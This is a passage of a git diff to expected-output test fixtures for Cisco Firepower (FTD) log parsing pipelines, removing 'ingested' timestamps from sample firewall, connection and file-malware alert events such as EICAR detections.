 "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2792,7 +2753,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981515310Z",
 "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)",
 "code": "302015",
 "kind": "event",
@@ -2871,7 +2831,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981516063Z",
 "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]",
 "code": "106023",
 "kind": "event",
@@ -2948,7 +2907,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981516893Z",
 "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]",
 "code": "106023",
 "kind": "event",
@@ -3026,7 +2984,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981517647Z",
 "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)",
 "code": "302013",
 "kind": "event",
@@ -3106,7 +3063,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981518396Z",
 "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)",
 "code": "302013",
 "kind": "event",
@@ -3188,7 +3144,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T10:00:24.981519156Z",
 "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3269,7 +3224,6 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T10:00:24.981519915Z",
 "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3350,7 +3304,6 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T10:00:24.981520672Z",
 "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3423,7 +3376,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981521502Z",
 "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside",
 "code": "106015",
 "kind": "event",
@@ -3493,7 +3445,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981522258Z",
 "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside",
 "code": "106015",
 "kind": "event",
@@ -3568,7 +3519,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981523012Z",
 "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]",
 "code": "106023",
 "kind": "event",
@@ -3646,7 +3596,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981523867Z",
 "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)",
 "code": "302013",
 "kind": "event",
@@ -3726,7 +3675,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981524625Z",
 "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)",
 "code": "302013",
 "kind": "event",
@@ -3808,7 +3756,6 @@
 "severity": 6,
 "duration": 86399000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T10:00:24.981525459Z",
 "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3881,7 +3828,6 @@
 "event": {
 "severity": 6,
 "duration": 122000000000,
- "ingested": "2021-12-29T10:00:24.981526225Z",
 "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416",
 "code": "302016",
 "kind": "event",
@@ -3948,7 +3894,6 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-29T10:00:24.981526986Z",
 "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4012,7 +3957,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981527739Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4020,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981528495Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4083,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981529314Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4146,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981530073Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4209,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981530841Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4332,7 +4272,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981531595Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4335,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981532348Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4471,7 +4409,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981533176Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4473,6 @@ }, "event": { "severity": 3, - "ingested": "2021-12-29T10:00:24.981533928Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4535,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981534692Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4680,7 +4615,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981535447Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4696,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981536210Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", 
@@ -4844,7 +4777,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981536978Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4840,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981537736Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4964,7 +4895,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981538499Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +4956,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981539265Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 97b3aa17e73..eb319af746d 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json 
@@ -62,7 +62,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267947324Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -178,7 +177,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267950193Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", 
@@ -317,7 +315,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267951306Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -456,7 +453,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267952266Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", 
@@ -590,7 +586,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267953190Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -733,7 +728,6 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-29T10:00:48.267954098Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", 
@@ -872,7 +866,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267955013Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1012,7 +1005,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267955919Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", 
@@ -1136,7 +1128,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267956814Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1268,7 +1259,6 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-29T10:00:48.267957712Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index 4a954480a68..678674723fb 100644 
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -61,7 +61,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762161265Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -163,7 +162,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762163789Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -265,7 +263,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762164652Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", 
@@ -367,7 +364,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762165426Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -476,7 +472,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762166194Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", 
@@ -589,7 +584,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762166955Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -702,7 +696,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762168052Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", 
@@ -830,7 +823,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762168804Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -944,7 +936,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762169557Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", 
@@ -1070,7 +1061,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762170373Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index 801d4ecc4c6..d0eceae22c2 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json 
@@ -106,7 +106,6 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-29T10:01:25.059010401Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, 